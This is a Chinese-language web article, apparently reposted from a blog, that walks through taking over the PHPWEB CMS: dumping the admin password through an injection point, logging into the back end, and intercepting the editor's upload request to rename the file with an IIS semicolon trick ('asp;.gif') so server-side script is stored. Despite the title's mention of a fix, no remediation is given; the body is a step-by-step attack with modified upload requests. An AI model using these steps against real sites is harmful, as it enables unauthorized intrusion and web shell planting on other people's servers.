入门 硬件知识 电脑基础 上网入门 故障 电脑修护 电脑健康 精通电脑 网站 DIV+CSS 建站知识 SEO知识
教程 电脑操作 平面设计 路由设置 技巧 Word Excel QQ技巧 壁纸 自然风景 酷车美女 系统桌面
系统 安装系统 系统技巧 系统设置 安全 木马查杀 黑客防御 安全资讯 美女 明星写真 清纯美女 性感美女

主页 > 网络安全 > 安全知识 > INTRODUCE

PHPWEB后台拿SHELL编辑器抓包NC漏洞及修复

发布时间:2013-04-19 作者:电脑知识网 来源:www.sogoupc.com 字号:

 

 

刚看完电视闲着睡不着,搜狗电脑知识网,随便找了个CMS在这玩,PHPWEB这么差劲啊,www.Sogoupc.com,后台编辑器既然存在这种初级漏洞,刚看到一个别人说抓包后照样改的:

 

 

只适用于IIS的....apache没得玩....

 

先用注射点跑出密码

down/class/index.php?myord=1

 

之后后台地址是admin.php

 

登陆进去,找个发布文章的地方,找到一个发布文章的地方,比如

down/admin/down_conadd.php

 

点下面详细介绍里面的图片按钮`之后选择一个文件上传

这个时候抓包或者用本地代理的工具

-----------------------------7db229330de4

Content-Disposition: form-data; name="fileName"

 

201108181313610483553.jpg

-----------------------------7db229330de4

Content-Disposition: form-data; name="attachPath"

 

down/pics/

-----------------------------7db229330de4

Content-Disposition: form-data; name="fileData"; filename="xm.jpg"

Content-Type: text/plain

 

 

得到上面的报文...

自己构造下,把filename="xm.jpg"改成filename="xm.php;.jpg"

之后发包就OK了...

 

 

 

 

这个我试了,不管用。

 

后来试着去尝试改生成之后的文件名截断,类似下边这样

 

 

 

 

-----------------------------7db29f214078c

 

Content-Disposition: form-data; name="fileName"

 

 

 

201109241316808273671.asp;.gif

 

-----------------------------7db29f214078c

 

Content-Disposition: form-data; name="attachPath"

 

 

 

news/pics/

 

-----------------------------7db29f214078c

 

Content-Disposition: form-data; name="fileData"; filename="2.asp;.gif"

 

Content-Type: text/plain

 

 

 

gb2312

 

<%

 

on error resume next

 

%>

 

 

 

这回管用了。

 

 

 

我在想个问题是不是类似这样的编辑器都存在NC提交问题呢?我一会试试其他的。

 from:zgg的空间


文章: PHPWEB后台拿SHELL编辑器抓包NC漏洞及修复
地址:http://www.sogoupc.com/anquan/201304/5551.html
------分隔线----------------------------
------分隔线----------------------------
热门安全知识文章推荐